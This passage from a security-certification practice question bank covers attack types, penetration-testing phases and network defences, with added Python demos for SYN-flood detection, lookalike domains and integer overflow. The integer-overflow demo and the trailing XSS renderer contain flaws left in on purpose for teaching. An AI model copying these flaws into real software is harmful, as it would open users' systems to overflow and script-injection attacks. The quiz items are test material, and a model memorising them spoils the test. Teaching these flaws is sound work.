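    return "\n".join(f"<li>{html.escape(r, quote=True)}</li>" for r in reviews)


def has_script_tag(page):
    return "<script" in page.lower()


if __name__ == "__main__":
    print(render_vulnerable(REVIEWS))
    print(render_safe(REVIEWS))
```

Encode at output time, in the context the value lands in (HTML body here; attribute, JavaScript and URL contexts each need their own encoder), rather than trying to strip tags on input.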
- 113. A user is redirected to a different website when the user requests the DNS record
- www.xyz.com. Which of the following is this an example of?
- A. DNS poisoning
- B. DoS
- C. DNS caching
- D. Smurf attack
- 114. Tom is the network administrator for a small accounting firm. As soon as he comes in to
- work, users report to him that they cannot connect to the network. After investigating,
- Tom discovers that none of the workstations can connect to the network and all have an
- IP address in the form of 169.254.x.x. What has occurred?
- A. Smurf attack
- B. Man-in-the-middle attack
- C. DDoS
- D. DHCP starvation
- 115. Which of the following would most likely use a group of bots to stop a web server from
- accepting new requests?
- A. DoS
- B. DDoS
- C. Buffer overflow
- D. Trojan horse
- 116. Which of the following would a former employee most likely plant on a server before leav-
- ing to cause disruption to the network?
- A. Worm
- B. Logic bomb
- C. Trojan
- D. Virus
- 117. A SYN flood is a DoS attack in which an attacker deliberately violates the three-way
- handshake and opens a large number of half-open TCP connections. The signature of a
- SYN flood attack is:
- A. The source and destination address having the same value
- B. The source and destination port numbers having the same value
- C. A large number of SYN packets appearing on a network without the corresponding
- ACK packets
- D. A large number of SYN packets appearing on a network with the corresponding
- reply RST
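The signature that question 117 states and the single-source variant in question 92, as an added example that is not part of the question bank: the detector counts, per destination, the SYNs seen against the ACKs that would complete the handshake, and then separates a flood from one dominant source (which can simply be blocked) from a distributed one. The connection records and the thresholds are constructed assumptions for the demonstration, not captured traffic.

```python
from collections import defaultdict

# Constructed connection records, not captured traffic: (source IP, destination
# IP, TCP flag sent by the source). A legitimate client sends SYN and later the
# final ACK; flood sources send SYNs and never complete the handshake.
NORMAL = [
    ("10.0.0.5", "203.0.113.10", "SYN"), ("10.0.0.5", "203.0.113.10", "ACK"),
    ("10.0.0.6", "203.0.113.10", "SYN"), ("10.0.0.6", "203.0.113.10", "ACK"),
]
SINGLE_SOURCE_FLOOD = NORMAL + [("198.51.100.7", "203.0.113.10", "SYN")] * 200
DISTRIBUTED_FLOOD = NORMAL + [
    (f"198.51.100.{i}", "203.0.113.10", "SYN") for i in range(1, 101) for _ in range(3)
]


def half_open_stats(records):
    """Per destination: SYNs, ACKs, SYNs with no matching ACK, and source spread."""
    syn_by_src = defaultdict(lambda: defaultdict(int))
    ack_total = defaultdict(int)
    for src, dst, flag in records:
        if flag == "SYN":
            syn_by_src[dst][src] += 1
        elif flag == "ACK":
            ack_total[dst] += 1
    stats = {}
    for dst, per_src in syn_by_src.items():
        syns = sum(per_src.values())
        stats[dst] = {
            "syn": syns,
            "ack": ack_total[dst],
            "half_open": syns - ack_total[dst],
            "sources": len(per_src),
            "top_source_share": max(per_src.values()) / syns,
        }
    return stats


def classify(stats, min_half_open=100, min_ratio=0.9):
    """Signature: a large number of SYNs without the corresponding ACK.
    The thresholds are illustrative assumptions; tune them to the link's
    normal SYN rate."""
    if stats["half_open"] < min_half_open or stats["half_open"] / stats["syn"] < min_ratio:
        return "normal"
    # One dominant source (question 92) can be blocked at the firewall; a
    # distributed flood needs SYN cookies or upstream filtering instead.
    if stats["top_source_share"] >= 0.9:
        return "syn-flood-single-source"
    return "syn-flood-distributed"


if __name__ == "__main__":
    for name, log in (("normal", NORMAL), ("single", SINGLE_SOURCE_FLOOD),
                      ("distributed", DISTRIBUTED_FLOOD)):
        print(name, classify(half_open_stats(log)["203.0.113.10"]))
```

Option D in the question (SYN followed by RST) is what a port scan or a closed port produces, not a flood: the connection is torn down immediately and consumes no backlog entry, which is why the signature is the missing ACK rather than the presence of a reply.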
- 118. What does white-box testing mean?
- A. The tester has full knowledge of the environment.
- B. The tester has no knowledge of the environment.
- C. The tester has permission to access the system.
- D. The tester has no permission to access the system.
- 119. Ahmed has been hired to perform a penetration test of Acme Corporation. He begins by
- looking at IP address ranges owned by the company and details of domain name registra-
- tion. He also visits social media and newsgroups to see if they contain any sensitive
- information or have any technical details online. Within the context of penetration-testing
- methodology, what phase is Ahmed conducting?
- A. Passive information gathering
- B. Active information gathering
- C. Initial exploitation
- D. Vulnerability scanning
- 120. Mary works for a large insurance company, on their cybersecurity team. She is investigat-
- ing a recent incident and discovers that a server was breached using an authorized user’s
- account. After investigating the incident further, Mary believes that the authorized user
- logged on, and then someone else took over their session. What best describes this attack?
- A. Man-in-the-middle
- B. Session hijacking
- C. Backdoor
- D. Smurf attack
- 121. Which of the following type of testing utilizes an automated process of proactively identi-
- fying vulnerabilities of the computing systems present on a network?
- A. Security audit
- B. Vulnerability scanning
- C. White-box test
- D. Black-box test
- 122. What type of attack is an NFC most susceptible to?
- A. Eavesdropping
- B. Man-in-the-middle
- C. Buffer overflow
- D. Smurf attack
- 123. John has been asked to do a penetration test of a company. He has been given general
- information but no details about the network. What kind of test is this?
- A. Gray-box
- B. White-box
- C. Partial
- D. Masked
- 124. Under which type of attack does an attacker’s system appear to be the server to the real
- client and appear to be the client to the real server?
- A. Denial of service
- B. Replay
- C. Eavesdropping
- D. Man-in-the-middle
- 125. You are a security administrator for Acme Corporation. You have discovered malware on
- some of your company’s machines. This malware seems to intercept calls from the web
- browser to libraries, and then manipulates the browser calls. What type of attack is this?
- A. Man-in-the-browser
- B. Man-in-the-middle
- C. Buffer overflow
- D. Session hijacking
- 126. Your company has hired a penetration testing firm to test the company network security.
- The penetration tester has just been able to achieve guest-level privileges on one low-
- security system. What best describes this phase of the test?
- A. Vulnerability scanning
- B. Initial exploit
- C. Black-box testing
- D. White-box testing
- 127. What is the primary risk from using outdated software?
- A. It may not have all the features you need.
- B. It may not have the most modern security features.
- C. It may no longer be supported by the vendor.
- D. It may be easier to break into than newer software.
- 128. You are responsible for software testing at Acme Corporation. You want to check all soft-
- ware for bugs that might be used by an attacker to gain entrance into the software or your
- network. You have discovered a web application that would allow a user to attempt to put
- a 64-bit value into a 4-byte integer variable. What is this type of flaw?
- A. Memory overflow
- B. Buffer overflow
- C. Variable overflow
- D. Integer overflow
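The flaw in question 128, as an added example that is not part of the question bank: the first function reproduces what a C assignment of a 64-bit value into a 4-byte signed integer does (the high bits are discarded and the low 32 bits are reinterpreted in two's complement), the second rejects out-of-range values instead of wrapping. The length-check pair shows why this matters: a bounds check performed on the truncated copy passes an attacker-supplied length of 2**32 + 16, which later sizes a copy with the full value. The limit and field names are constructed for the demonstration.

```python
INT32_MIN, INT32_MAX = -2**31, 2**31 - 1


def truncate_to_int32(value):
    """What storing a 64-bit value in a 4-byte signed int does in C: keep the
    low 32 bits and reinterpret them as two's complement."""
    low = value & 0xFFFFFFFF
    return low - 2**32 if low >= 2**31 else low


def to_int32_checked(value):
    """The fix: refuse anything outside the representable range instead of wrapping."""
    if not INT32_MIN <= value <= INT32_MAX:
        raise ValueError(f"{value} does not fit in a 32-bit signed integer")
    return value


def length_ok_vulnerable(requested, limit=1024):
    # Validates the truncated copy of an attacker-supplied 64-bit length field.
    # 2**32 + 16 becomes 16 and passes; 2**31 becomes negative and passes too.
    # The original value is then used to size a copy: integer overflow leading
    # to buffer overflow.
    return truncate_to_int32(requested) <= limit


def length_ok_safe(requested, limit=1024):
    # Range-check the original value, and reject negatives as well.
    try:
        return 0 <= to_int32_checked(requested) <= limit
    except ValueError:
        return False


if __name__ == "__main__":
    for n in (100, 2**31, 2**32 + 16):
        print(n, "->", truncate_to_int32(n),
              "vulnerable check:", length_ok_vulnerable(n),
              "safe check:", length_ok_safe(n))
```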
- 129. Which type of virus is most difficult to analyze by reverse engineering?
- A. Polymorphic
- B. Macro
- C. Armored
- D. Boot sector
- 130. What type of attack attempts to deauthorize users from a resource, such as a wireless
- access point (WAP)?
- A. Disassociation
- B. Session hijacking
- C. Man-in-the-middle
- D. Smurf attack
- 131. John is a network administrator for a large retail chain. He has discovered that his
- DNS server is being attacked. The attack involves false DNS requests from spoofed IP
- addresses. The requests are far larger than normal. What type of attack is this?
- A. Amplification
- B. DNS poisoning
- C. DNS spoofing
- D. Smurf attack
- 132. Heidi is a security officer for an investment firm. Many of the employees in her firm travel
- frequently and access the company intranet from remote locations. Heidi is concerned about
- users logging in from public WiFi, as well as other people seeing information such as login
- credentials or customer data. Which of the following is Heidi’s most significant concern?
- A. Social engineering
- B. Shoulder surfing
- C. Man-in-the-middle attack
- D. CSRF
- 133. Cross-site scripting is an attack on the ______ that is based on the ______ trusting the ______.
- A. user, user, website
- B. user, website, user
- C. website, website, user
- D. user, website, website
- 134. You are a security officer for a large investment firm. Some of your stock traders handle
- very valuable accounts with large amounts of money. You are concerned about someone
- targeting these specific traders to get their login credentials and access account informa-
- tion. Which of the following best describes the attack you are concerned about?
- A. Spear phishing
- B. Man-in-the-middle
- C. Target phishing
- D. Vishing
- 135. You lead an incident response team for a large retail chain store. You have discovered
- what you believe is spyware on the point-of-sale systems. But the malware in question is
- encrypted, preventing you from analyzing it. What best describes this?
- A. An armored virus
- B. Ransomware
- C. Polymorphic virus
- D. Trojan horse
- 136. Jared has discovered malware on the workstations of several users. This particular mal-
- ware provides administrative privileges for the workstation to an external hacker. What
- best describes this malware?
- A. Trojan horse
- B. Logic bomb
- C. Multipartite virus
- D. Rootkit
- 137. Users in your company report someone has been calling their extension and claiming to
- be doing a survey for a large vendor. Based on the questions asked in the survey, you sus-
- pect that this is a scam to elicit information from your company’s employees. What best
- describes this?
- A. Spear phishing
- B. Vishing
- C. War dialing
- D. Robocalling
- 138. Cross-site request forgery is an attack on the ______ that is based on the ______ trusting the ______.
- A. website, website, user
- B. user, user, website
- C. website, user, website
- D. user, website, user
- 139. What type of virus can infect both a file in the operating system and the boot sector?
- A. Multipartite
- B. Rootkit
- C. Ransomware
- D. Worm
- 140. John is analyzing a recent malware infection on his company network. He discovers mal-
- ware that can spread rapidly and does not require any interaction from the user. What
- best describes this malware?
- A. Worm
- B. Virus
- C. Logic bomb
- D. Trojan horse
- 141. Your company has issued some new security directives. One of these new directives is that
- all documents must be shredded before being thrown out. What type of attack is this try-
- ing to prevent?
- A. Phishing
- B. Dumpster diving
- C. Shoulder surfing
- D. Man-in-the-middle
- 142. What type of attack embeds malicious code into a document or spreadsheet?
- A. Logic bomb
- B. Rootkit
- C. Trojan horse
- D. Macro virus
- 143. You are a network security analyst for an online retail website. Users report that they
- have visited your site and had their credit cards stolen. You cannot find any evidence of
- any breach of your website. You begin to suspect that these users were lured to a fake site.
- You have found a website that is spelled exactly like your company site, with one letter
- different. What is this attack called?
- A. URL hijacking
- B. DNS poisoning
- C. Cross-site scripting
- D. Man-in-the-middle
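The "spelled exactly like your company site, with one letter different" check from question 143, as an added example that is not part of the question bank: a Levenshtein edit distance flags registered or observed hostnames within one edit of the legitimate domain, which covers substitution, a dropped letter and an added letter; raising the distance to 2 also catches swapped letters. The legitimate domain and candidate list are constructed for the demonstration.

```python
# Constructed legitimate domain and observed hostnames (not data from the page).
LEGITIMATE = "acmeretail.com"
OBSERVED = [
    "acmeretail.com",        # the real site
    "acmeretai1.com",        # l -> 1 substitution
    "acmretail.com",         # dropped letter
    "acmeretails.com",       # added letter
    "totallyunrelated.org",
]


def edit_distance(a, b):
    """Levenshtein distance: fewest insertions, deletions and substitutions
    that turn a into b (dynamic programming, one row kept at a time)."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1,                  # delete ca
                           cur[j - 1] + 1,               # insert cb
                           prev[j - 1] + (ca != cb)))    # substitute
        prev = cur
    return prev[-1]


def lookalike_domains(candidates, legitimate, max_distance=1):
    """Hostnames within max_distance edits of the legitimate domain, excluding
    the exact match. Distance 1 is the 'one letter different' case; distance 2
    also catches a transposition such as acmeretial.com."""
    legit = legitimate.lower()
    return [c for c in candidates if 0 < edit_distance(c.lower(), legit) <= max_distance]


if __name__ == "__main__":
    for host in lookalike_domains(OBSERVED, LEGITIMATE):
        print("lookalike:", host)
```

Run this against newly registered domain feeds or the hostnames in your mail and proxy logs; a hit is a candidate for a takedown request and for a block on the mail gateway, not proof of fraud on its own.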
- 144. You have discovered that someone has been trying to log on to your web server. The person
- has tried a wide range of likely passwords. What type of attack is this?
- A. Rainbow table
- B. Birthday attack
- C. Dictionary attack
- D. Spoofing
- 145. You have just started a new job as a security administrator for Acme Corporation. You
- discover they have weak authentication protocols. You are concerned that an attacker
- might simply capture and re-send a user’s login credentials. What type of attack is this?
- A. Replay attack
- B. IP spoofing
- C. Login spoofing
- D. Session hijacking
- 146. What is the primary difference between active and passive reconnaissance?
- A. Active will be done manually, passive with tools.
- B. Active is done with black-box tests and passive with white-box tests.
- C. Active is usually done by attackers and passive by testers.
- D. Active will actually connect to the network and could be detected; passive won’t.
- 147. What is the primary difference between a vulnerability scan and a penetration test?
- A. Vulnerability scans are done by employees and penetration tests by outside teams.
- B. Vulnerability scans only use tools; penetration tests are manual.
- C. Vulnerability scans just identify issues; penetration tests attempt to exploit them.
- D. Vulnerability scans are usually white-box tests; penetration tests are black-box tests.
- 148. When an attacker breaches one system and uses that as a base to attack a related system,
- what is this called?
- A. Man-in-the-middle
- B. Pivot
- C. Shimming
- D. Vishing
- 149. Terrance is conducting a penetration test for a client. The client is a major e-commerce
- company and is primarily concerned about security for their web server. He has just
- finished running Nmap and OWASP Zap on the target web server. What is this activity
- called?
- A. Passive scanning
- B. Black-box testing
- C. Active scanning
- D. White-box testing
- 150. You have just taken over as the CISO for a large bank. You are concerned about making
- sure all systems are secure. One major concern you have is security misconfiguration.
- Which of the following is not a common security misconfiguration?
- A. Unpatched operating system
- B. Default accounts with passwords
- C. Unneeded services running
- D. No firewall running
- Chapter 2: Technologies and Tools
- ✓ ✓ 2.1 Install and configure network components, both hardware- and software-based, to support organizational security.
- ■ ■ Firewall
-   ■ ■ ACL
-   ■ ■ Application-based vs. network-based
-   ■ ■ Stateful vs. stateless
-   ■ ■ Implicit deny
- ■ ■ VPN concentrator
-   ■ ■ Remote access vs. site-to-site
-   ■ ■ IPSec
-     ■ ■ Tunnel mode
-     ■ ■ Transport mode
-     ■ ■ AH
-     ■ ■ ESP
-   ■ ■ Split tunnel vs. full tunnel
-   ■ ■ TLS
-   ■ ■ Always-on VPN
- ■ ■ NIPS/NIDS
-   ■ ■ Signature-based
-   ■ ■ Heuristic/behavioral
-   ■ ■ Anomaly
-   ■ ■ Inline vs. passive
-   ■ ■ In-band vs. out-of-band
-   ■ ■ Rule
-   ■ ■ Analytics
-     ■ ■ False positive
-     ■ ■ False negative
- ■ ■ Router
-   ■ ■ ACLs
-   ■ ■ Antispoofing
- ■ ■ Switch
-   ■ ■ Port security
-   ■ ■ Layer 2 vs. Layer 3
-   ■ ■ Loop prevention
-   ■ ■ Flood guard
- ■ ■ Proxy
-   ■ ■ Forward and reverse proxy
-   ■ ■ Transparent
-   ■ ■ Application/multipurpose
- ■ ■ Load balancer
-   ■ ■ Scheduling
-     ■ ■ Affinity
-     ■ ■ Round-robin
-   ■ ■ Active-passive
-   ■ ■ Active-active
-   ■ ■ Virtual IPs
- ■ ■ Access point
-   ■ ■ SSID
-   ■ ■ MAC filtering
-   ■ ■ Signal strength
-   ■ ■ Band selection/width
-   ■ ■ Antenna types and placement
-   ■ ■ Fat vs. thin
-   ■ ■ Controller-based vs. standalone
- ■ ■ SIEM
-   ■ ■ Aggregation
-   ■ ■ Correlation
-   ■ ■ Automated alerting and triggers
-   ■ ■ Time synchronization
-   ■ ■ Event deduplication
-   ■ ■ Logs/WORM
- ■ ■ DLP
-   ■ ■ USB blocking
-   ■ ■ Cloud-based
-   ■ ■ Email
- ■ ■ NAC
-   ■ ■ Dissolvable vs. permanent
-   ■ ■ Host health checks
-   ■ ■ Agent vs. agentless
- ■ ■ Mail gateway
-   ■ ■ Spam filter
-   ■ ■ DLP
-   ■ ■ Encryption
- ■ ■ Bridge
- ■ ■ SSL/TLS accelerators
- ■ ■ SSL decryptors
- ■ ■ Media gateway
- ■ ■ Hardware security module
- ✓ ✓ 2.2 Given a scenario, use appropriate software tools to assess the security posture of an organization.
- ■ ■ Protocol analyzer
- ■ ■ Network scanners
-   ■ ■ Rogue system detection
-   ■ ■ Network mapping
- ■ ■ Wireless scanners/cracker
- ■ ■ Password cracker
- ■ ■ Vulnerability scanner
- ■ ■ Configuration compliance scanner
- ■ ■ Exploitation frameworks
- ■ ■ Data sanitization tools
- ■ ■ Steganography tools
- ■ ■ Honeypot
- ■ ■ Backup utilities
- ■ ■ Banner grabbing
- ■ ■ Passive vs. active
- ■ ■ Command line tools
-   ■ ■ ping
-   ■ ■ netstat
-   ■ ■ tracert
-   ■ ■ nslookup/dig
-   ■ ■ arp
-   ■ ■ ipconfig/ip/ifconfig
-   ■ ■ tcpdump
-   ■ ■ nmap
-   ■ ■ netcat
- ✓ ✓ 2.3 Given a scenario, troubleshoot common security issues.
- ■ ■ Unencrypted credentials/clear text
- ■ ■ Logs and events anomalies
- ■ ■ Permission issues
- ■ ■ Access violations
- ■ ■ Certificate issues
- ■ ■ Data exfiltration
- ■ ■ Misconfigured devices
-   ■ ■ Firewall
-   ■ ■ Content filter
-   ■ ■ Access points
- ■ ■ Weak security configurations
- ■ ■ Personnel issues
-   ■ ■ Policy violation
-   ■ ■ Insider threat
-   ■ ■ Social engineering
-   ■ ■ Social media
-   ■ ■ Personal email
- ■ ■ Unauthorized software
- ■ ■ Baseline deviation
- ■ ■ License compliance violation (availability/integrity)
- ■ ■ Asset management
- ■ ■ Authentication issues
- ✓ ✓ 2.4 Given a scenario, analyze and interpret output from security technologies.
- ■ ■ HIDS/HIPS
- ■ ■ Antivirus
- ■ ■ File integrity check
- ■ ■ Host-based firewall
- ■ ■ Application whitelisting
- ■ ■ Removable media control
- ■ ■ Advanced malware tools
- ■ ■ Patch management tools
- ■ ■ UTM
- ■ ■ DLP
- ■ ■ Data execution prevention
- ■ ■ Web application firewall
- ✓ ✓ 2.5 Given a scenario, deploy mobile devices securely.
- ■ ■ Connection methods
-   ■ ■ Cellular
-   ■ ■ WiFi
-   ■ ■ SATCOM
-   ■ ■ Bluetooth
-   ■ ■ NFC
-   ■ ■ ANT
-   ■ ■ Infrared
-   ■ ■ USB
- ■ ■ Mobile device management concepts
-   ■ ■ Application management
-   ■ ■ Content management
-   ■ ■ Remote wipe
-   ■ ■ Geofencing
-   ■ ■ Geolocation
-   ■ ■ Screen locks
-   ■ ■ Push notification services
-   ■ ■ Passwords and pins
-   ■ ■ Biometrics
-   ■ ■ Context-aware authentication
-   ■ ■ Containerization
-   ■ ■ Storage segmentation
-   ■ ■ Full device encryption
- ■ ■ Enforcement and monitoring for:
-   ■ ■ Third-party app stores
-   ■ ■ Rooting/jailbreaking
-   ■ ■ Sideloading
-   ■ ■ Custom firmware
-   ■ ■ Carrier unlocking
-   ■ ■ Firmware OTA updates
-   ■ ■ Camera use
-   ■ ■ SMS/MMS
-   ■ ■ External media
-   ■ ■ USB OTG
-   ■ ■ Recording microphone
-   ■ ■ GPS tagging
-   ■ ■ WiFi direct/ad hoc
-   ■ ■ Tethering
-   ■ ■ Payment methods
- ■ ■ Deployment models
-   ■ ■ BYOD
-   ■ ■ COPE
-   ■ ■ CYOD
-   ■ ■ Corporate-owned
-   ■ ■ VDI
- ✓ ✓ 2.6 Given a scenario, implement secure protocols.
- ■ ■ Protocols
-   ■ ■ DNSSEC
-   ■ ■ SSH
-   ■ ■ S/MIME
-   ■ ■ SRTP
-   ■ ■ LDAPS
-   ■ ■ FTPS
-   ■ ■ SFTP
-   ■ ■ SNMPv3
-   ■ ■ SSL/TLS
-   ■ ■ HTTPS
-   ■ ■ Secure POP/IMAP
- ■ ■ Use cases
-   ■ ■ Voice and video
-   ■ ■ Time synchronization
-   ■ ■ Email and web
-   ■ ■ File transfer
-   ■ ■ Directory services
-   ■ ■ Remote access
-   ■ ■ Domain name resolution
-   ■ ■ Routing and switching
-   ■ ■ Network address allocation
-   ■ ■ Subscription services
- Technologies and Tools
- 1. John is looking for a new firewall for a small company. He is concerned about DoS
- attacks, particularly the SYN flood. Which type of firewall would give the best protection
- against the SYN flood?
- A. Packet filter
- B. Application gateway
- C. Bastion
- D. SPI
- 2. You are responsible for network security at an insurance company. A lot of employ-
- ees bring their own devices. You have security concerns about this. You have decided
- to implement a process whereby when users connect to your network, their devices are
- scanned. If a device does not meet your minimum security requirements, it is not allowed
- to connect. What best describes this?
- A. NAC
- B. SPI
- C. IDS
- D. BYOD
- 3. Ahmed is responsible for VPN connections at his company. His company uses IPSec
- exclusively. He has decided to implement IPSec in a mode that encrypts the data of only
- the packet, not the headers. What is this called?
- A. Tunneling
- B. IKE
- C. ESP
- D. Transport
- 4. Maria is responsible for monitoring IDS activity on her company’s network. Twice in the
- past month there has been activity reported on the IDS that investigation has shown was
- legitimate traffic. What best describes this?
- A. False negative
- B. Passive
- C. Active
- D. False positive
- 5. Juanita is a network administrator for a large university. The university has numerous
- systems, each with logs she must monitor and analyze. What would be the best approach
- for her to view and analyze logs from a central server?
- A. NAC
- B. Port forwarding
- C. IDS
- D. SIEM
- 6. Enrique is responsible for web application security at his company. He is concerned about
- attacks such as SQL injection. Which of the following devices would provide the best pro-
- tection for web attacks on his web application server?
- A. ACL
- B. SPI
- C. WAF
- D. IDS
- 7. ACME Company has several remote offices. The CIO wants to set up permanent secure
- connections between the remote offices and the central office. What would be the best
- solution for this?
- A. L2TP VPN
- B. IPSEC VPN
- C. Site-to-site VPN
- D. Remote-access VPN
- 8. Mary is responsible for network security at a medium-sized insurance company. She is
- concerned that the offices are too open to public traffic and someone could simply con-
- nect a laptop to an open RJ45 jack and access the network. Which of the following would
- best address this concern?
- A. ACL
- B. IDS
- C. VLAN
- D. Port security
- 9. You are the network administrator for an e-commerce company. You are responsible for
- the web server cluster. You are concerned about not only failover, but also load-balancing
- and using all the servers in your cluster to accomplish load-balancing. What should you
- implement?
- A. Active-active
- B. Active-passive
- C. Affinity
- D. Round-robin
- 10. Donald is working as a network administrator. He is responsible for the database cluster.
- Connections are load-balanced in the cluster by each new connection being simply sent to
- the next server in the cluster. What type of load-balancing is this?
- A. Round-robin
- B. Affinity
- C. Weighted
- D. Rotating
- 11. Gerald is setting up new wireless access points throughout his company’s building. The
- wireless access points have just the radio transceiver, with no additional functionality.
- What best describes these wireless access points?
- A. Fat
- B. Repeater
- C. Thick
- D. Thin
- 12. Mohaned is an IT manager for a hotel. His hotel wants to put wireless access points on
- each floor. The specifications state that the wireless access points should have minimal
- functionality, with all the configuration, authentication, and other functionality centrally
- controlled. What type of wireless access points should Mohaned consider purchasing?
- A. Fat
- B. Controller-based
- C. Stand-alone
- D. 802.11i
- 13. What IPSec protocol provides authentication and encryption?
- A. AH
- B. ESP
- C. IKE
- D. ISAKMP
- 14. Terrance is implementing IPSec. He wants to ensure that the packets are encrypted, and
- that the packet and all headers are authenticated. What should he implement?
- A. AH
- B. ESP
- C. AH and ESP
- D. IKE
- 15. You are responsible for security at your company. One of management’s biggest concerns
- is that employees might exfiltrate sensitive data. Which of the following would you
- implement first?
- A. IPS
- B. Routine audits of user machines
- C. VLAN
- D. USB blocking
- 16. You are responsible for email server security in your company. You want to implement
- encryption of all emails, using third-party authenticated certificates. What protocol
- should you implement?
- A. IMAP
- B. S/MIME
- C. PGP
- D. SMTP-S
- 17. Joanne is responsible for all remote connectivity to her company’s network. She knows
- that administrators frequently log in to servers remotely to execute command-line com-
- mands and Linux shell commands. She wants to make sure this can only be done if the
- transmission is encrypted. What protocol should she use?
- A. HTTPS
- B. RDP
- C. Telnet
- D. SSH
- 18. You are responsible for network management at your company. You have been using
- SNMP for many years. You are currently using SNMP v2. A colleague has recently
- suggested you upgrade to SNMP v3. What is the primary benefit of SNMP v3?
- A. It is much faster.
- B. It integrates with SIEM.
- C. It uses CHAP authentication.
- D. It is encrypted.
- 19. Employees in your company are allowed to use tablets. They can select a tablet from four
- different models approved by the company but purchased by the employee. What best
- describes this?
- A. BYOD
- B. CYOD
- C. COPE
- D. BYOE
- 20. Mahmoud is considering moving all company desktops to a VDI deployment. Which of
- the following would be a security advantage of VDI?
- A. Employees can work from any computer in the company.
- B. VDI is more resistant to malware.
- C. Patch management is centrally controlled.
- D. It eliminates man-in-the-middle attacks.
- 21. You have been assigned to select a backup communication method for your company to
- use in case of significant disasters that disrupt normal communication. Which option
- would provide the most reliability?
- A. Cellular
- B. WiFi
- C. SATCOM
- D. VoIP
- 22. John is concerned about the security of data on smartphones and tablets that his company
- issues to employees. Which of the following would be most effective in preventing data
- loss, should a device be stolen?
- A. Remote wipe
- B. Geolocation
- C. Strong PIN
- D. Limited data storage
- 23. What does geofencing accomplish?
- A. Provides the location for a mobile device.
- B. Limits the range a mobile device can be used in.
- C. Determines WiFi coverage areas.
- D. Segments the WiFi.
- 24. What best describes mobile device content management?
- A. Limiting how much content can be stored.
- B. Limiting the type of content that can be stored.
- C. Blocking certain websites.
- D. Digitally signing authorized content.
- 25. Frank believes there could be a problem accessing the DHCP server from a specific client.
- He wants to check by getting a new dynamic IP. What command will do this?
- A. ipconfig /request
- B. NETSTAT -renew
- C. ipconfig /renew
- D. NETSTAT /request
- 26. Teresa is responsible for network administration at a health club chain. She is trying to
- find a communication technology that uses low power and can spend long periods in
- low-power sleep modes. Which of the following technologies would be the best fit?
- A. WiFi
- B. Cellular
- C. Bluetooth
- D. ANT
- 27. What technology was first introduced in Windows Vista and still exists in Windows that
- helps prevent malware by requiring user authorization to run executables?
- A. DEP
- B. DLP
- C. UTM
- D. ANT
- 28. John is responsible for security of his company’s new e-commerce server. He wants to
- ensure that online transactions are secure. What technology should he use?
- A. L2TP
- B. IPSec
- C. SSL
- D. TLS
- 29. Frank is a network administrator for a small college. The college has implemented a
- simple NIDS. However, the NIDS seems to only catch well-known attacks. What
- technology is this NIDS likely missing?
- A. Heuristic scanning
- B. Signature scanning
- C. Passive scanning
- D. Active scanning
- 30. You are concerned about an attacker enumerating all of your network. What protocol
- might help at least mitigate this issue?
- A. HTTPS
- B. TLS
- C. IPSec
- D. LDAPS
- 31. You have been asked to implement a secure protocol for transferring files that uses digital
- certificates. Which protocol would be the best choice?
- A. FTP
- B. SFTP
- C. FTPS
- D. SCP
- 32. Ahmed is responsible for VoIP at his company. He has been directed to ensure that all
- VoIP calls have the option to be encrypted. What protocol is best suited for securing
- VoIP calls?
- A. SIP
- B. TLS
- C. SRTP
- D. SSH
- 33. What is the purpose of screen locks on mobile devices?
- A. To encrypt the device
- B. To limit access to the device
- C. To load a specific user’s apps
- D. To connect to WiFi
- 34. Maria is a security engineer with a large bank. Her CIO has asked her to investigate
- the use of context-aware authentication for online banking. Which of the following best
- describes context-aware authentication?
- A. In addition to username and password, authentication is based on the entire context
- (location, time of day, action being attempted, etc.).
- B. Without a username or password, authentication is based on the entire context
- (location, time of day, action being attempted, etc.).
- C. Authentication that requires a username and password, but in the context of a token
- or digital certificate
- D. Authentication that requires a username and password, but not in the context of a
- token or digital certificate
- 35. What does application management accomplish for mobile devices?
- A. Only allows applications from the iTunes store to be installed
- B. Ensures the company has a list of all applications on the devices
- C. Ensures only approved applications are installed on the devices
- D. Updates patches on all applications on mobile devices
- 36. Dominick is responsible for security at a medium-sized insurance company. He is very
- concerned about detecting intrusions. The IDS he has purchased states that he must have
- an IDS on each network segment. What type of IDS is this?
- A. Active
- B. IPS
- C. Passive
- D. Inline
- 37. Remote employees at your company frequently need to connect to both the secure
- company network via VPN and open public websites, simultaneously. What technology
- would best support this?
- A. Split tunnel
- B. IPSec
- C. Full tunnel
- D. TLS
- 38. Denish is looking for a solution that will allow his network to retrieve information from a
- wide range of web resources, while all traffic passes through a proxy. What would be the
- best solution?
- A. Forward proxy
- B. Reverse proxy
- C. SPI
- D. Open proxy
- 39. Someone has been rummaging through your company’s trash bins seeking to find
- documents, diagrams, or other sensitive information that has been thrown out. What
- is this called?
- A. Dumpster diving
- B. Trash diving
- C. Social engineering
- D. Trash engineering
- 40. Derrick is responsible for a web server cluster at his company. The cluster uses various
- load-balancing protocols. Derrick wants to ensure that clients connecting from Europe are
- directed to a specific server in the cluster. What would be the best solution to his problem?
- A. Affinity
- B. Binding
- C. Load balancing
- D. Round-robin
- 41. Teresa is responsible for WiFi security in her company. Her main concern is that there are
- many other offices in the building her company occupies and that someone could easily
- attempt to breach their WiFi from one of these locations. What technique would be best
- in alleviating her concern?
- A. Using thin WAPs
- B. Geofencing
- C. Securing the Admin screen
- D. WAP placement
- 42. Juan is responsible for the SIEM in his company. The SIEM aggregates logs from 12 servers.
- In the event that a breach is discovered, which of the following would be Juan’s most important
- concern?
- A. Event duplication
- B. Time synchronization
- C. Impact assessment
- D. Correlation
- 43. When you are considering an NIDS or NIPS, what are your two most important
- concerns?
- A. Cost and false positives
- B. False positives and false negatives
- C. Power consumption and cost
- D. Management interface and cost
- 44. Shelly is very concerned about unauthorized users connecting to the company routers.
- She would like to prevent spoofing. What is the most essential antispoofing technique for
- routers?
- A. ACL
- B. Logon
- C. NIPS
- D. NIDS
- 45. Farès has implemented a flood guard. What type of attack is this most likely to defend
- against?
- A. SYN attack
- B. DNS poisoning
- C. MAC spoofing
- D. ARP spoofing
- 46. Terrance is trying to get all of his users to connect to a certificate server on his network.
- However, some of the users are using machines that are incompatible with the certificate
- server, and changing those machines is not an option. Which of the following would be
- the best solution for Terrance?
- A. Use an application proxy for the certificate server.
- B. Use NAT with the certificate server.
- C. Change the server.
- D. Implement a protocol analyzer.
- 47. John is implementing virtual IP load-balancing. He thinks this might alleviate network
- slowdowns, and perhaps even mitigate some of the impact of a denial-of-service attack.
- What is the drawback of virtual IP load-balancing?
- A. It is resource-intensive.
- B. Most servers don’t support it.
